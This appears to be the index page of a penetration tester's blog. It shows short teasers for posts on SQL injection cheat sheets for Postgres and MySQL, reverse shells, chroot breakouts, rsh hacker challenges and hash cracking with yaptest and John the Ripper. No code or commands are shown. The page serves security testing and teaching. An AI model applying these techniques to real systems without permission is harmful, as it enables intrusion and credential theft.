Blog
Updated Postgres SQL Injection Cheat Sheet
I just read Nico Leidecker’s Having Fun With Postgres paper. He mostly talks about the dblink function which is sometimes enabled in Postgres – it’s a bit like MSSQL’s openrowset . There’s also some good generic advice on what to do when you get DBA access – like exeucting OS-level commands. I’ve updated the cheat […]
Scapy in PERL
Scaperl is basically scapy in PERL. Kinda useful for PERL-geeks like me who have yet to even write “Hello World” in Python.
Getting RSH on Linux to work like RSH on Solaris
If you’ve tried setting up rsh/rlogin based hacker challenges on Linux over the last few years you’ve probably noticed that Linux (I tried Redhat and Debian) doesn’t behave like Solaris. This makes either for really bad hacker challenges, or for ones involving lots of Solaris boxes. I finally found the answer recently so thought I’d […]
Update to MySQL Injection Cheat Sheet
I just added some more notes to the MySQL Injection Cheat Sheet about command executation, file upload, privilege enumeration, casting, avoiding quotes and more. The cheat sheet is reasonably complete now.
Minor Update: Yapscan v0.7.3
I just updated yapscan . It no longer crashes when two debug flags are used for TCP scans.
Using SSH Without A TTY
I recently received a mail asking how to get SSH to work from within a reverse shell (see php-reverse-shell , php-findsock-shell and perl-reverse-shell ). I thought I’d write a brief description of the problems I’ve seen and how to work round them. I’d be very interested if anyone has any better solutions. Drop me a […]
Breaking Out of a Chroot Jail Using PERL
I had cause to want to break out of a chroot’d environment recently. It is well known that if you’re root within the chroot environment you can break out of it. I set about learning how to break out of chroot and came across an excellent description by Simes from 2002. It contains a well […]
A Quick Look at Windows 2008 Server Beta
I recently installed Windows 2008 Beta in a VMWare Machine to see what Microsoft have in store for us. Being a pentester, I mainly looked at the default security setting, so don’t go expecting a review of the shiney new GUI…
Yaptest Update: v0.0.6
This release of yaptest adds supports for more tools, fixes some bugs and has partial support for keeping track of which users belong to which groups of the systems you’ve comrpomised. The full list of changes is shown below. The yaptest installation page has links to the newly supported tools if you want to download […]
Yaptest Update: v0.0.5
Yaptest is now also able to call John the Ripper to crack NTLM hashes (v0.0.4 only supported LANMAN hashes). It’s also possible to specify your own command line for calling John The Ripper (incase you want to run the MPI version of John under mpiexec for example). For those particularly troublesome LANMAN hashes, yaptest is […]